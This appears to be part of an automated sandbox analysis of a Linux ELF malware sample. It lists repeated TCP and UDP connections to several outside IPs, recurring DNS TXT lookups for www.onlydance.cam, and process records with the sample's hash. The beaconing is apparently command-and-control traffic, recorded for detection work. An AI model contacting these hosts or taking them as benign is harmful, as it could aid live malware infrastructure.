                                                            Jan 5, 2025 21:33:39.205482960 CET4951064715192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:33:40.010612965 CET6471549510188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:33:40.010669947 CET4951064715192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:33:40.201308012 CET4951064715192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:33:40.206634998 CET6471549510188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:33:40.206677914 CET4951064715192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:33:50.679858923 CET6058645123192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:33:50.684631109 CET4512360586188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:33:50.684673071 CET6058645123192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:33:51.491507053 CET4512360586188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:33:51.491552114 CET6058645123192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:33:51.680483103 CET6058645123192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:33:51.689436913 CET4512360586188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:33:51.689480066 CET6058645123192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:33:57.330694914 CET43928443192.168.2.2391.189.91.42
                                                            Jan 5, 2025 21:34:02.157501936 CET3370862849192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:34:02.162388086 CET6284933708188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:34:02.162437916 CET3370862849192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:34:02.992134094 CET6284933708188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:34:02.992182970 CET3370862849192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:34:03.158152103 CET3370862849192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:34:03.163548946 CET6284933708188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:34:03.163594007 CET3370862849192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:34:13.623807907 CET582045837192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:34:13.628597975 CET583758204156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:34:13.628698111 CET582045837192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:34:14.630927086 CET583758204156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:34:14.630981922 CET582045837192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:34:14.630981922 CET582045837192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:34:14.636003017 CET583758204156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:34:14.636053085 CET582045837192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:34:25.106409073 CET4168418234192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:25.111196041 CET182344168438.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:34:25.111301899 CET4168418234192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:26.132992029 CET182344168438.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:34:26.133065939 CET4168418234192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:26.133090973 CET4168418234192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:26.138014078 CET182344168438.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:34:26.138154984 CET182344168438.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:34:26.138201952 CET4168418234192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:36.624835014 CET5229645123192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:36.629647970 CET451235229638.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:34:36.629708052 CET5229645123192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:37.646553993 CET451235229638.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:34:37.646624088 CET5229645123192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:37.646624088 CET5229645123192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:37.651649952 CET451235229638.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:34:37.651705027 CET5229645123192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:48.154113054 CET5229845123192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:48.158920050 CET451235229838.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:34:48.158977985 CET5229845123192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:49.182123899 CET451235229838.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:34:49.182178020 CET5229845123192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:49.182178020 CET5229845123192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:49.187189102 CET451235229838.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:34:49.187346935 CET5229845123192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:34:59.661273956 CET4930064715192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:34:59.666091919 CET6471549300156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:34:59.666186094 CET4930064715192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:00.629514933 CET6471549300156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:35:00.629601955 CET4930064715192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:00.662513971 CET4930064715192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:00.667615891 CET6471549300156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:35:00.667679071 CET4930064715192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:11.129786015 CET4625210321192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:11.134624958 CET103214625238.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:35:11.134689093 CET4625210321192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:12.142724991 CET103214625238.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:35:12.142791986 CET4625210321192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:12.142823935 CET4625210321192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:12.147828102 CET103214625238.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:35:12.147876978 CET4625210321192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:22.608191013 CET3672223016192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:22.614831924 CET230163672238.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:35:22.614917994 CET3672223016192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:23.641920090 CET230163672238.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:35:23.641973972 CET3672223016192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:23.642009974 CET3672223016192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:23.648555994 CET230163672238.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:35:23.648605108 CET3672223016192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:34.119656086 CET4962262849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:34.124468088 CET6284949622156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:35:34.124536991 CET4962262849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:35.093756914 CET6284949622156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:35:35.093811989 CET4962262849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:35.120966911 CET4962262849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:35.125937939 CET6284949622156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:35:35.126097918 CET6284949622156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:35:35.126147032 CET4962262849192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:45.603224993 CET3672623016192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:45.608020067 CET230163672638.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:35:45.608072996 CET3672623016192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:46.609147072 CET230163672638.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:35:46.609204054 CET3672623016192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:46.609204054 CET3672623016192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:46.614269018 CET230163672638.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:35:46.614315033 CET3672623016192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:35:57.086409092 CET3709219823192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:57.091192007 CET1982337092156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:35:57.091259003 CET3709219823192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:58.085458040 CET1982337092156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:35:58.085534096 CET3709219823192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:58.087188959 CET3709219823192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:35:58.092176914 CET1982337092156.244.6.20192.168.2.23
                                                            Jan 5, 2025 21:35:58.092231989 CET3709219823192.168.2.23156.244.6.20
                                                            Jan 5, 2025 21:36:08.556152105 CET3777623016192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:36:08.560991049 CET2301637776188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:36:08.561105967 CET3777623016192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:36:09.372661114 CET2301637776188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:36:09.372721910 CET3777623016192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:36:09.557229996 CET3777623016192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:36:09.606832027 CET2301637776188.166.182.194192.168.2.23
                                                            Jan 5, 2025 21:36:09.606888056 CET3777623016192.168.2.23188.166.182.194
                                                            Jan 5, 2025 21:36:20.087004900 CET4170418234192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:36:20.091811895 CET182344170438.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:36:20.091902971 CET4170418234192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:36:21.127031088 CET182344170438.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:36:21.127106905 CET4170418234192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:36:21.127106905 CET4170418234192.168.2.2338.60.221.89
                                                            Jan 5, 2025 21:36:21.132193089 CET182344170438.60.221.89192.168.2.23
                                                            Jan 5, 2025 21:36:21.132241964 CET4170418234192.168.2.2338.60.221.89
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 5, 2025 21:32:53.104648113 CET5642453192.168.2.238.8.8.8
                                                            Jan 5, 2025 21:32:53.111542940 CET53564248.8.8.8192.168.2.23
                                                            Jan 5, 2025 21:32:54.132074118 CET4720119302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:32:54.600579023 CET193024720174.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:33:04.607175112 CET3543053192.168.2.23208.67.222.222
                                                            Jan 5, 2025 21:33:04.614105940 CET5335430208.67.222.222192.168.2.23
                                                            Jan 5, 2025 21:33:05.621891022 CET5350019302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:33:06.076561928 CET193025350074.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:33:16.084494114 CET5209953192.168.2.23208.67.222.222
                                                            Jan 5, 2025 21:33:16.093369007 CET5352099208.67.222.222192.168.2.23
                                                            Jan 5, 2025 21:33:17.104954004 CET3554319302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:33:17.673186064 CET193023554374.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:33:27.678865910 CET4315153192.168.2.238.8.4.4
                                                            Jan 5, 2025 21:33:27.715528011 CET53431518.8.4.4192.168.2.23
                                                            Jan 5, 2025 21:33:28.716743946 CET4298219302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:33:29.186603069 CET193024298274.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:33:39.193263054 CET5752153192.168.2.23208.67.220.220
                                                            Jan 5, 2025 21:33:39.200340986 CET5357521208.67.220.220192.168.2.23
                                                            Jan 5, 2025 21:33:40.201356888 CET3463119302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:33:40.662565947 CET193023463174.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:33:50.669532061 CET4301353192.168.2.23208.67.222.222
                                                            Jan 5, 2025 21:33:50.679538965 CET5343013208.67.222.222192.168.2.23
                                                            Jan 5, 2025 21:33:51.680526972 CET4524919302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:33:52.128787041 CET193024524974.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:34:02.136037111 CET5618453192.168.2.238.8.4.4
                                                            Jan 5, 2025 21:34:02.157203913 CET53561848.8.4.4192.168.2.23
                                                            Jan 5, 2025 21:34:03.158204079 CET5267619302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:34:03.607393026 CET193025267674.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:34:13.616149902 CET5633353192.168.2.238.8.8.8
                                                            Jan 5, 2025 21:34:13.623265982 CET53563338.8.8.8192.168.2.23
                                                            Jan 5, 2025 21:34:14.631036997 CET4779419302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:34:15.091548920 CET193024779474.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:34:25.098925114 CET4541953192.168.2.23208.67.220.220
                                                            Jan 5, 2025 21:34:25.105935097 CET5345419208.67.220.220192.168.2.23
                                                            Jan 5, 2025 21:34:26.133131027 CET5597719302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:34:26.611078978 CET193025597774.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:34:36.617352962 CET4950753192.168.2.238.8.4.4
                                                            Jan 5, 2025 21:34:36.624416113 CET53495078.8.4.4192.168.2.23
                                                            Jan 5, 2025 21:34:37.646668911 CET3864719302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:34:38.111288071 CET193023864774.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:34:48.119641066 CET5782953192.168.2.238.8.4.4
                                                            Jan 5, 2025 21:34:48.153800011 CET53578298.8.4.4192.168.2.23
                                                            Jan 5, 2025 21:34:49.182225943 CET4477619302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:34:49.648600101 CET193024477674.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:34:59.654088974 CET5419753192.168.2.23208.67.220.220
                                                            Jan 5, 2025 21:34:59.660779953 CET5354197208.67.220.220192.168.2.23
                                                            Jan 5, 2025 21:35:00.662614107 CET5764519302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:35:01.113306046 CET193025764574.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:35:11.120501041 CET4412153192.168.2.23208.67.220.220
                                                            Jan 5, 2025 21:35:11.129308939 CET5344121208.67.220.220192.168.2.23
                                                            Jan 5, 2025 21:35:12.142865896 CET3737019302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:35:12.594001055 CET193023737074.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:35:22.598947048 CET5146553192.168.2.23208.67.222.222
                                                            Jan 5, 2025 21:35:22.607567072 CET5351465208.67.222.222192.168.2.23
                                                            Jan 5, 2025 21:35:23.642052889 CET4888219302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:35:24.103972912 CET193024888274.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:35:34.111684084 CET4526953192.168.2.238.8.8.8
                                                            Jan 5, 2025 21:35:34.119158983 CET53452698.8.8.8192.168.2.23
                                                            Jan 5, 2025 21:35:35.121093035 CET3624619302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:35:35.590164900 CET193023624674.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:35:45.595643997 CET3959153192.168.2.238.8.8.8
                                                            Jan 5, 2025 21:35:45.602895975 CET53395918.8.8.8192.168.2.23
                                                            Jan 5, 2025 21:35:46.609246969 CET5716219302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:35:47.070221901 CET193025716274.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:35:57.078949928 CET5651153192.168.2.238.8.8.8
                                                            Jan 5, 2025 21:35:57.086105108 CET53565118.8.8.8192.168.2.23
                                                            Jan 5, 2025 21:35:58.087299109 CET3402919302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:35:58.542454004 CET193023402974.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:36:08.549447060 CET3529053192.168.2.238.8.4.4
                                                            Jan 5, 2025 21:36:08.555710077 CET53352908.8.4.4192.168.2.23
                                                            Jan 5, 2025 21:36:09.557360888 CET3586419302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:36:10.061880112 CET193023586474.125.250.129192.168.2.23
                                                            Jan 5, 2025 21:36:20.070734978 CET5819153192.168.2.23208.67.222.222
                                                            Jan 5, 2025 21:36:20.085949898 CET5358191208.67.222.222192.168.2.23
                                                            Jan 5, 2025 21:36:21.127150059 CET4727819302192.168.2.2374.125.250.129
                                                            Jan 5, 2025 21:36:21.581876993 CET193024727874.125.250.129192.168.2.23
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 5, 2025 21:32:53.104648113 CET192.168.2.238.8.8.80x2b6aStandard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:33:04.607175112 CET192.168.2.23208.67.222.2220xf07fStandard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:33:16.084494114 CET192.168.2.23208.67.222.2220x6a61Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:33:27.678865910 CET192.168.2.238.8.4.40xd358Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:33:39.193263054 CET192.168.2.23208.67.220.2200x3680Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:33:50.669532061 CET192.168.2.23208.67.222.2220x74c9Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:34:02.136037111 CET192.168.2.238.8.4.40x8ff8Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:34:13.616149902 CET192.168.2.238.8.8.80x582eStandard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:34:25.098925114 CET192.168.2.23208.67.220.2200x5fc6Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:34:36.617352962 CET192.168.2.238.8.4.40x1f14Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:34:48.119641066 CET192.168.2.238.8.4.40x4049Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:34:59.654088974 CET192.168.2.23208.67.220.2200x2089Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:35:11.120501041 CET192.168.2.23208.67.220.2200xa2cfStandard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:35:22.598947048 CET192.168.2.23208.67.222.2220xf997Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:35:34.111684084 CET192.168.2.238.8.8.80x11fcStandard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:35:45.595643997 CET192.168.2.238.8.8.80x3e47Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:35:57.078949928 CET192.168.2.238.8.8.80xab7fStandard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:36:08.549447060 CET192.168.2.238.8.4.40x673aStandard query (0)www.onlydance.cam16IN (0x0001)false
                                                            Jan 5, 2025 21:36:20.070734978 CET192.168.2.23208.67.222.2220x3da9Standard query (0)www.onlydance.cam16IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 5, 2025 21:32:53.111542940 CET8.8.8.8192.168.2.230x2b6aNo error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:33:04.614105940 CET208.67.222.222192.168.2.230xf07fNo error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:33:16.093369007 CET208.67.222.222192.168.2.230x6a61No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:33:27.715528011 CET8.8.4.4192.168.2.230xd358No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:33:39.200340986 CET208.67.220.220192.168.2.230x3680No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:33:50.679538965 CET208.67.222.222192.168.2.230x74c9No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:34:02.157203913 CET8.8.4.4192.168.2.230x8ff8No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:34:13.623265982 CET8.8.8.8192.168.2.230x582eNo error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:34:25.105935097 CET208.67.220.220192.168.2.230x5fc6No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:34:36.624416113 CET8.8.4.4192.168.2.230x1f14No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:34:48.153800011 CET8.8.4.4192.168.2.230x4049No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:34:59.660779953 CET208.67.220.220192.168.2.230x2089No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:35:11.129308939 CET208.67.220.220192.168.2.230xa2cfNo error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:35:22.607567072 CET208.67.222.222192.168.2.230xf997No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:35:34.119158983 CET8.8.8.8192.168.2.230x11fcNo error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:35:45.602895975 CET8.8.8.8192.168.2.230x3e47No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:35:57.086105108 CET8.8.8.8192.168.2.230xab7fNo error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:36:08.555710077 CET8.8.4.4192.168.2.230x673aNo error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false
                                                            Jan 5, 2025 21:36:20.085949898 CET208.67.222.222192.168.2.230x3da9No error (0)www.onlydance.camTXT (Text strings)IN (0x0001)false

                                                            System Behavior

                                                            Start time (UTC):20:32:51
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:/tmp/i686.elf
                                                            File size:91760 bytes
                                                            MD5 hash:167e952f5a106e6959c974b25b7056fc

                                                            Start time (UTC):20:32:52
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:-
                                                            File size:91760 bytes
                                                            MD5 hash:167e952f5a106e6959c974b25b7056fc

                                                            Start time (UTC):20:32:52
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:-
                                                            File size:91760 bytes
                                                            MD5 hash:167e952f5a106e6959c974b25b7056fc

                                                            Start time (UTC):20:32:52
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:-
                                                            File size:91760 bytes
                                                            MD5 hash:167e952f5a106e6959c974b25b7056fc

                                                            Start time (UTC):20:32:52
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:-
                                                            File size:91760 bytes
                                                            MD5 hash:167e952f5a106e6959c974b25b7056fc

                                                            Start time (UTC):20:32:52
                                                            Start date (UTC):05/01/2025
                                                            Path:/tmp/i686.elf
                                                            Arguments:-
                                                            File size:91760 bytes
                                                            MD5 hash:167e952f5a106e6959c974b25b7056fc